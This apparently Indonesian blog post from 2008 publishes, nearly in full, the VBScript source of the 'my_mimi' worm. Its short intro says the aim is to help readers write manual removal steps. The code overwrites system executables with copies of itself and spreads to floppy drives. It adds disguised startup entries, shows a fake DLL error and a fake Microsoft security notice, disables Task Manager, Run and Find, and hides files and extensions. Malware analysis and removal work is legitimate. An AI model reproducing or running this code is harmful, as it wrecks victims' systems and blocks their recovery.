Darkside of Oktavianus

Making virus and all of them as our friends

Source code virus VBS Love Mimi by alienmars

Posted by oktavianus pada Januari 21, 2008

Nampaknya saya gak sempat dan tidak akan sempat membuat analisis virus bandel yang satu ini. tapi saya harap dengan memposting source code ini ada diantara teman2 yang mau membuat cara manual removalnya. dengan source code ini anda bisa melihat langsung badan virus dan apa saja yang dilakukannya. sehingga dapat melakukan pembersihan manual.
wassalam


——————————–[mulai]———————–
Set love = createobject(StrReverse(“tcejbOmetsySelif.gnitpircS”))

Set dear = createobject(StrReverse(“llehS.tpircSW”))

qi = “c:\regedit.vbs”

syau = “c:\mymimi.vbs”

heiji = “c:\notepad.vbs”

forest = “c:\antivirus.vbs”

han = “c:\windows\svchost.exe”

tachoor = “c:\windows\EXPL0RER.vbs”

mimi = “c:\windows\system\WinUpdt.vbs”

on error resume next

love.CopyFile wscript.scriptfullname, tachoor

on error resume next

love.CopyFile wscript.scriptfullname, mimi

on error resume next

iqra = dear.regread(“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernell32”)

If iqra <> “c:\windows\svchost.exe ” & tachoor then

on error resume next

dear.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptingHost\Settings\Timeout”, 0, “REG_DWORD”

dear.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernell32”, “c:\windows\svchost.exe ” & tachoor

dear.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVGuard32”, “c:\windows\svchost.exe ” & mimi

dear.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PCMAVscanner”, “c:\windows\svchost.exe ” & syau

done = MsgBox(“The application or DLL C:\WINDOWS\system32\MSVBVM60.DLL is not a valid Windows image. Please check this againts your installation diskette.”, 16, “msvbvm60.dll – Bad Image”)

dear.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\SVCH0ST”, “c:\windows\svchost.exe ” & mimi

love.CopyFile wscript.scriptfullname, “A:\diary_rahmi.vbe”

on error resume next

love.CopyFile wscript.scriptfullname, tachoor

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\msvbvm60.dll”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvm60.dll”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvm50.dll”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msihnd.dll”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvnvvm60.dll”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\TASKMAN.exe”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\NOTEPAD.exe”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\R.com”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\REGEDIT.com”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\regedit.exe”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\nusrmgr.cpl”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\cmd.exe”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\control.exe”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msiexec.exe”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\regedt32.exe”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\taskman.exe”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\taskmgr.exe”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\command.com”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\T.com”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\TASKMGR.com”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\Restore\rstrui.exe”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\Restore\srdiag.exe”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\Restore\srframe.mmf”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\Restore\rstrlog.dat”

on error resume next

cdrsqnx()

dwozmc()

ontrus()

else

on error resume next

love.CopyFile wscript.scriptfullname, “A:\diary_mimi.vbs”

on error resume next

love.CopyFile wscript.scriptfullname, tachoor

on error resume next

love.CopyFile wscript.scriptfullname, “C:\Documents and Settings\All Users\Start Menu\Programs\Startup\PCMAVExtMonitor.vbs”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvm60.dll”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvm50.dll”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\msvbvm60.dll”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvm60.dll”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvnvvm60.dll”

on error resume next

love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\nusrmgr.cpl”

on error resume next

hcdmshsx()

cdrsqnx()

dwozmc()

ontrus()

End if

Sub hcdmshsx()

Dim married

on error resume next

married = “<html><head><title>bandit corporation</title><b><center><h1><font color=” & chr(34) & “#FF0000″ & chr(34) & ” size=” & chr(34) & “10” & chr(34) & ” face=Verdana><br>my_mimi </font><font size=” & chr(34) & “8” & chr(34) & ” color=” & chr(34) & “#FF2244” & chr(34) & “>♥ </font><hr align=center width=” & chr(34) & “40%” & chr(34) & ” size=” & chr(34) & “2” & chr(34) & “></font></h1></head>” & “<body bgcolor=” & chr(34) & “#000000” & chr(34) & “><body><b><center><font color=” & chr(34) & “#FF0000″ & chr(34) & ” size=” & chr(34) & “4” & chr(34) & ” face=verdana></p><p><p><b><p><b><p><br><p>muka bego!! ngapain mandangin kompie ini trus2an!? cari dong anti virusnya!!<br><br><br><a href=” & chr(34) & “http://friendster.com/sywq&#8221; & chr(34) & “>klik di sini!</a></font></p><p></p><p></p><p></p><p><center><b><p><b><p><br><p><b><p><b><p><br><p><b><p><b><p><br><p><b><p><b><p><br><p><b><p><b><p><br><p><hr align=center width=” & chr(34) & “100%” & chr(34) & ” size=” & chr(34) & “4” & chr(34) & “><marquee><font color=” & chr(34) & “#00FF00″ & chr(34) & ” size=” & chr(34) & “4” & chr(34) & ” face=Verdana></font><font size=” & chr(34) & “4” & chr(34) & ” color=” & chr(34) & “#FF0000” & chr(34) & “>♣ ♠ ♦ ♥ </font><font color=” & chr(34) & “#FFFFFF” & chr(34) & ” size=” & chr(34) & “4” & chr(34) & “face=Verdana> Pada komputer ini bersarang virus my_mimi</font><font size=” & chr(34) & “4” & chr(34) & ” color=” & chr(34) & “#FF0000” & chr(34) & “> ♣ ♠ ♦ ♥ </font><font color=” & chr(34) & “#FFFFFF” & chr(34) & ” size=” & chr(34) & “4” & chr(34) & “face=Verdana> Komputer iko kanai virus my_mimi</font><font size=” & chr(34) & “4” & chr(34) & ” color=” & chr(34) & “#FF0000” & chr(34) & “> ♣ ♠ ♦ ♥ </font><font color=” & chr(34) & “#FFFFFF” & chr(34) & ” size=” & chr(34) & “4” & chr(34) & “face=Verdana> This computer is a victim of virus my_mimi</font><font size=” & chr(34) & “4” & chr(34) & ” color=” & chr(34) & “#FF0000” & chr(34) & “> ♣ ♠ ♦ ♥ </font><font color=” & chr(34) & “#00FF00″ & chr(34) & ” size=” & chr(34) & “4” & chr(34) & ” face=Verdana>with love, mr.han</font></marquee><hr align=center width=” & chr(34) & “100%” & chr(34) & ” size=” & chr(34) & “4” & chr(34) & “></center></html>”

Set hateness = love.createtextfile(“C:\windows\my_mimi.html”,1)

hateness.Write married

Set hateness = love.createtextfile(“C:\Documents and Settings\All Users\Desktop\mimi on internet.html”,1)

hateness.Write married

hateness.Close

on error resume next

Set broken = love.createtextfile(“C:\Documents and Settings\All Users\Start Menu\Programs\Startup\sywq.ini”, 1)

broken.WriteLine “::::::,…..:;.,,,,,..,…,,,::,,,,:::::::::;:;;;;;;;rrrrrr;;;;;;r@@@AS2AMHG3hrsy@” & vbCrlf & “:,….,,…..;,,.. … ..:,,:::::::::::;;;;;;;;rrrrsr;;;;;;;:s@@@92322@@@;wQ@” & vbCrlf & “..,,,,,,,,,..,, .;r3HAH@@@G5:….,:::::::;;;s;;;;;;rrrrrssrr;;;r;;,X@X5XXXHMB@3201” & vbCrlf & “,,,,,,,,,,,. .i&@@@@@@@@@@@@@@9Sr,.;::::;;;:s;;;;;rrrr;;:;;;;;:;;;::G22X3H@2sAMB3,” & vbCrlf & “,,,,,,,,,,. r@@@@@@@@@@@@###@@@@@#Sr;::;;;;:rr;rrs;;::::::,,:rGB2r:,r23&B@M2r#@@@h” & vbCrlf & “,,,,,,,,,..&@@@@@@@@@@#AX5525S5h@@@5::;;;;;;rr;;;:::::,,.:sG@@@@@@HSs2XA##A9rB@@@B” & vbCrlf & “,,,,,,,,.:@@@@@###AAA95iSS522XB@M5SA;:;rrr;;;::::,,,..:iA@@@@@@@@@@@ASX3HHA&r3&G&H” & vbCrlf & “,,,,,,,.:@@@@@##Mh225XGM##H&GSX##AS5s:;rr;:::,,,…:5M@@@@@@####@@@@@323AAHAr2HA&&” & vbCrlf & “,,,,,,,.A@@@####B35XH#####MA92i2#@@Br,..,::::,.,;X#@@@@@##MMMMMM####@@AhhhBAsX#BBA” & vbCrlf & “,,,,,,.5@@##M##@#92&AhhH#@#A922sr5srSs;…,,:;H@@@@@@#MBBBBBMMMBHHB##3s2AGMHi5&HMA” & vbCrlf & “,,,,,,;@@#MBM##@@XiX9B#@@BA9X253HBB@#2s;…..,rh@@@@##MMMMMMBBHHAA2: rHMHi2GXGA” & vbCrlf & “;,,,,.s@@#MM###@#5s2AAX5552XhGX@@@BAXSir;…. ;h@@@###MBBHH&hS, A#B59B3X3” & vbCrlf & “;:,:, s@@MB#####hsiSissiS2223&AAh3X&&X93S; … ,2#@#MBBHG3Xii.,, H@B2G#A&h” & vbCrlf & “:;::,..M@MBB##@HSrsssiS222XX32222�###MH&X…… .iB@#h2Sii53X:r: M@BX�HAG” & vbCrlf & “::;::, ;@#MMM#@#2rsSiS222XXX3X9A#@HAHM@#G&; .,,…. rGA35522X&X:r: ##B&HBBH&” & vbCrlf & “::;;:,. S@#MM#@@H5iSSS522XX339&MMGhB##@@M&;,:..,,…. ;hMAX52XAX:r; ##B&HAHBA” & vbCrlf & “:::;:::. 2B93AMMH&255SS2XX3939G&G&BMBH&hX2,.;;:……… :XMHX2XA9;;,,##BHMHAMA” & vbCrlf & “:;;;;::. s#5XGHX2iS55552X9hhG&ABBHA&&ABBB; .,:;,…,,,… .iBM&XGAr,r##BMAsHMH” & vbCrlf & “rr;::,,,. XAA#AGGSsS222X39G&&AAA&hh&B##@@: …,:;,..,,,,,… rA#H&X,;##B#& rMA” & vbCrlf & “::,,,,,,,. ,shA5235sS22X3h&AAAAA&&HM#@@@9 …..,:;,..,,,,.,. :9##Xi##B#@r.2G” & vbCrlf & “:::,,,,,,.. :X@@3rri2X339G&AHM##@@@@@#Xr …..,,::,..,,….. ,5MAM#M#@@@@&” & vbCrlf & “:,,,,,,,,… ;B@M2s29GAAHM#@@@@@@###MHHi …….,::,……… r##M@@#@@@” & vbCrlf & “,,,,,,,,…… ,iSS9&AAAAAHHHHHA&GGGAAMs ..::, …… .:3MMB#@#BHM” & vbCrlf & “,,,,,,………. ,29999939h&AA&&AB#@@@@3:,.. .,. .. ,@@@#BB#@@AAH” & vbCrlf & “,,,,,,,…,……. s23GAB##########@@@@@@@@@@@@BhSr:,,. ,M@@@@@@#B#@@HGA” & vbCrlf & “,,,,,,,,,.,,.. ,:;�#@@###MMMM#MMBBM###@@@@@@@@@@@@@@@@H2H@@@@@@@@@@#@@#GA” & vbCrlf & “,,,,,,,,,,. ,;rsiSh#@@@@@@#####MMM#######MBHAH#@#BMMB25hBM#@@@@@@@@#@@@@@@@@@@AA” & vbCrlf & “,,,,,,,.. :X@@@@@@@@@@@@@@####MMMM#######MMMMB&M@@@###HX3XX995hHAAA&�@@@@@@@@@MA” & vbCrlf & “,,,,,,,. ;B@@@@@@@@@@@##M##########MH&923&BHH#@HHM#@@@MB##952A3X&Hi2hB#@@@@#@@@@@B” & vbCrlf & “,,,,,,,.9@@@@#@@##@@@@#MM########@@MB##MBM#@@@@@#h2SA#@#H;sX33&hXAX392&AM#A2B@@@@@” & vbCrlf & “,,,,,,.2@@BM#MM#@##@@@@#B#@@@@@@@@@@@@@@@@@@@@@@@##@#@@@@ASG9h&Xh9hSA23X32S3�@@@@” & vbCrlf & “,,,,,.:@@AB##M####@@@@@@#M#@@@@@#@@@@@@@@@@@@@@@@@#@@@@@@@@@2i5iX5s2G355X2GG2iG@@#” & vbCrlf & “,,,,,.&@BMBBM#M#@#@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@##@@@@@@@@@@@B#MA9G#M##MBA#MX2#@” & vbCrlf & “::,,.;@#M#HH###M#@@@@@@@@@##@@@##@@#@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@BM@” & vbCrlf & “…. ;BHHBHHMM##M##@@@@@@@@######@@@@@@@@@############@@@@@@@@@###################” & vbCrlf & “” & vbCrlf & “mimi…” & vbCrlf & “lo emang my_mimi!!” & vbCrlf & “” & vbCrlf & “however you are,,” & vbCrlf & “IjustWANNAbeWITHu..” & vbCrlf & ” ” & vbCrlf & “[credits]” & vbCrlf & ” ” & vbCrlf & “mr.han (d_janer’z crew!)” & vbCrlf & “haecal (d_janer’z crew!)” & vbCrlf & “rendi (d_janer’z crew!)” & vbCrlf & “siwa (d_janer’z crew!)”& vbCrlf & “kharisma (phatigokil)” & vbCrlf & “all d_janer’z crew!!! smansa padang”

Set broken = love.createtextfile(“C:\Documents and Settings\All Users\Desktop\my beLoved mimi.ini”, 1)

broken.WriteLine “::::::,…..:;.,,,,,..,…,,,::,,,,:::::::::;:;;;;;;;rrrrrr;;;;;;r@@@AS2AMHG3hrsy@” & vbCrlf & “:,….,,…..;,,.. … ..:,,:::::::::::;;;;;;;;rrrrsr;;;;;;;:s@@@92322@@@;wQ@” & vbCrlf & “..,,,,,,,,,..,, .;r3HAH@@@G5:….,:::::::;;;s;;;;;;rrrrrssrr;;;r;;,X@X5XXXHMB@3201” & vbCrlf & “,,,,,,,,,,,. .i&@@@@@@@@@@@@@@9Sr,.;::::;;;:s;;;;;rrrr;;:;;;;;:;;;::G22X3H@2sAMB3,” & vbCrlf & “,,,,,,,,,,. r@@@@@@@@@@@@###@@@@@#Sr;::;;;;:rr;rrs;;::::::,,:rGB2r:,r23&B@M2r#@@@h” & vbCrlf & “,,,,,,,,,..&@@@@@@@@@@#AX5525S5h@@@5::;;;;;;rr;;;:::::,,.:sG@@@@@@HSs2XA##A9rB@@@B” & vbCrlf & “,,,,,,,,.:@@@@@###AAA95iSS522XB@M5SA;:;rrr;;;::::,,,..:iA@@@@@@@@@@@ASX3HHA&r3&G&H” & vbCrlf & “,,,,,,,.:@@@@@##Mh225XGM##H&GSX##AS5s:;rr;:::,,,…:5M@@@@@@####@@@@@323AAHAr2HA&&” & vbCrlf & “,,,,,,,.A@@@####B35XH#####MA92i2#@@Br,..,::::,.,;X#@@@@@##MMMMMM####@@AhhhBAsX#BBA” & vbCrlf & “,,,,,,.5@@##M##@#92&AhhH#@#A922sr5srSs;…,,:;H@@@@@@#MBBBBBMMMBHHB##3s2AGMHi5&HMA” & vbCrlf & “,,,,,,;@@#MBM##@@XiX9B#@@BA9X253HBB@#2s;…..,rh@@@@##MMMMMMBBHHAA2: rHMHi2GXGA” & vbCrlf & “;,,,,.s@@#MM###@#5s2AAX5552XhGX@@@BAXSir;…. ;h@@@###MBBHH&hS, A#B59B3X3” & vbCrlf & “;:,:, s@@MB#####hsiSissiS2223&AAh3X&&X93S; … ,2#@#MBBHG3Xii.,, H@B2G#A&h” & vbCrlf & “:;::,..M@MBB##@HSrsssiS222XX32222�###MH&X…… .iB@#h2Sii53X:r: M@BX�HAG” & vbCrlf & “::;::, ;@#MMM#@#2rsSiS222XXX3X9A#@HAHM@#G&; .,,…. rGA35522X&X:r: ##B&HBBH&” & vbCrlf & “::;;:,. S@#MM#@@H5iSSS522XX339&MMGhB##@@M&;,:..,,…. ;hMAX52XAX:r; ##B&HAHBA” & vbCrlf & “:::;:::. 2B93AMMH&255SS2XX3939G&G&BMBH&hX2,.;;:……… :XMHX2XA9;;,,##BHMHAMA” & vbCrlf & “:;;;;::. s#5XGHX2iS55552X9hhG&ABBHA&&ABBB; .,:;,…,,,… .iBM&XGAr,r##BMAsHMH” & vbCrlf & “rr;::,,,. XAA#AGGSsS222X39G&&AAA&hh&B##@@: …,:;,..,,,,,… rA#H&X,;##B#& rMA” & vbCrlf & “::,,,,,,,. ,shA5235sS22X3h&AAAAA&&HM#@@@9 …..,:;,..,,,,.,. :9##Xi##B#@r.2G” & vbCrlf & “:::,,,,,,.. :X@@3rri2X339G&AHM##@@@@@#Xr …..,,::,..,,….. ,5MAM#M#@@@@&” & vbCrlf & “:,,,,,,,,… ;B@M2s29GAAHM#@@@@@@###MHHi …….,::,……… r##M@@#@@@” & vbCrlf & “,,,,,,,,…… ,iSS9&AAAAAHHHHHA&GGGAAMs ..::, …… .:3MMB#@#BHM” & vbCrlf & “,,,,,,………. ,29999939h&AA&&AB#@@@@3:,.. .,. .. ,@@@#BB#@@AAH” & vbCrlf & “,,,,,,,…,……. s23GAB##########@@@@@@@@@@@@BhSr:,,. ,M@@@@@@#B#@@HGA” & vbCrlf & “,,,,,,,,,.,,.. ,:;�#@@###MMMM#MMBBM###@@@@@@@@@@@@@@@@H2H@@@@@@@@@@#@@#GA” & vbCrlf & “,,,,,,,,,,. ,;rsiSh#@@@@@@#####MMM#######MBHAH#@#BMMB25hBM#@@@@@@@@#@@@@@@@@@@AA” & vbCrlf & “,,,,,,,.. :X@@@@@@@@@@@@@@####MMMM#######MMMMB&M@@@###HX3XX995hHAAA&�@@@@@@@@@MA” & vbCrlf & “,,,,,,,. ;B@@@@@@@@@@@##M##########MH&923&BHH#@HHM#@@@MB##952A3X&Hi2hB#@@@@#@@@@@B” & vbCrlf & “,,,,,,,.9@@@@#@@##@@@@#MM########@@MB##MBM#@@@@@#h2SA#@#H;sX33&hXAX392&AM#A2B@@@@@” & vbCrlf & “,,,,,,.2@@BM#MM#@##@@@@#B#@@@@@@@@@@@@@@@@@@@@@@@##@#@@@@ASG9h&Xh9hSA23X32S3�@@@@” & vbCrlf & “,,,,,.:@@AB##M####@@@@@@#M#@@@@@#@@@@@@@@@@@@@@@@@#@@@@@@@@@2i5iX5s2G355X2GG2iG@@#” & vbCrlf & “,,,,,.&@BMBBM#M#@#@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@##@@@@@@@@@@@B#MA9G#M##MBA#MX2#@” & vbCrlf & “::,,.;@#M#HH###M#@@@@@@@@@##@@@##@@#@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@BM@” & vbCrlf & “…. ;BHHBHHMM##M##@@@@@@@@######@@@@@@@@@############@@@@@@@@@###################” & vbCrlf & “” & vbCrlf & “mimi…” & vbCrlf & “lo emang my_mimi!!” & vbCrlf & “” & vbCrlf & “however you are,,” & vbCrlf & “IjustWANNAbeWITHu..” & vbCrlf & ” ” & vbCrlf & “[credits]” & vbCrlf & ” ” & vbCrlf & “mr.han (d_janer’z crew!)” & vbCrlf & “haecal (d_janer’z crew!)” & vbCrlf & “rendi (d_janer’z crew!)” & vbCrlf & “siwa (d_janer’z crew!)” & vbCrlf & “kharisma (phatigokil)” & vbCrlf & “all d_janer’z crew!!! smansa padang”

Set broken = love.createtextfile(qi, 1)

broken.WriteLine “MsgBox ” & chr(34) & “Knp sih kamu buka regedit? Dah bosan ya jadi temen aku? Kamu tega banget!” & chr(34) & “, vbOKonly,” & chr(34) & “my_mimi : (” & chr(34)

Set broken = love.createtextfile(heiji, 1)

broken.WriteLine “MsgBox ” & chr(34) & “Kamu nyari notepad ya? Dia lagi pergi ma wordpad. Ada pesan?” & chr(34) & “, vbOKonly,” & chr(34) & “my_mimi : P” & chr(34)

Set broken = love.createtextfile(forest, 1)

broken.WriteLine “MsgBox ” & chr(34) & “Ngapain kamu make antivirus? Kamu pikir aku ini virus yg ngerusak kamu? Klo gitu biar aku cari teman lain aja!” & chr(34) & “, vbOKonly,” & chr(34) & “my_mimi : (” & chr(34)

Set broken = love.createtextfile(syau, 1)

broken.WriteLine “MsgBox ” & chr(34) & “hy, seneng deyh ketemuwh kamu lagi!” & chr(34) & “, vbOKonly,” & chr(34) & “my_mimi ^_~” & chr(34)

broken.Close

End sub

Sub cdrsqnx()

On Error resume next

Set dear = createobject(StrReverse(“llehS.tpircSW”))

with dear

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext”, “Windows Security Center has been detected a new kind virus on your machine {codename: my_mimi}. This virus can causes your machine MELEDAK GITU LOH! Please tell Microsoft about this or use Microsoft Windows Automatic Update. For further information, contact us at : customercare@microsoft.com ”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption”, “Windows Security Center Alert”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Start Page”, “C:\windows\my_mimi.html”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Logon User Name”, “mimi”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName”, “mimi”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName”, “mimi”

.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\ConvertedWallpaper”, “C:\windowsmy_mimi.html”

.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveActive”, “1”

.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE”, “C:\WINDOWS\system32\marquee.scr”

.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Attributes”, “00011”

.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\BackgroundColor”, “0 0 0”

.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\CharSet”, “0”

.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Font”, “Verdana”

.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Mode”, “1”

.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Size”, “24”

.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Speed”, “3”

.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Text”, “my_mimi by mr. han (d_janer’z crew!)”

.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\TextColor”, “255 0 0”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchHidden”, 0, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchSystemDirs”, 0, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ThumbnailSize”, 100, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden”, 1, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoFolderOptions”, 0, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 1, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 0, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”, 1, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”, 4, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled”, 1, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, 1, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchHidden”, 0, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchSystemDirs”, 0, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ThumbnailSize”, 100, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoFolderOptions”, 0, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 0, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ControlPanelInMyComputer\CheckedValue”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ControlPanelInMyComputer\UncheckedValue”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ControlPanelInMyComputer\DefaultValue”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\CheckedValue”, 0, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\UncheckedValue”, 0, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\DefaultValue”, 0, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\WarningIfNotDefault”, “Ngapain sih main buka-bukaan? Ntar aku bilang mama kamu lho!”

.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\CheckedValue”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\UncheckedValue”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\CheckedValue”, 1, “REG_DWORD”

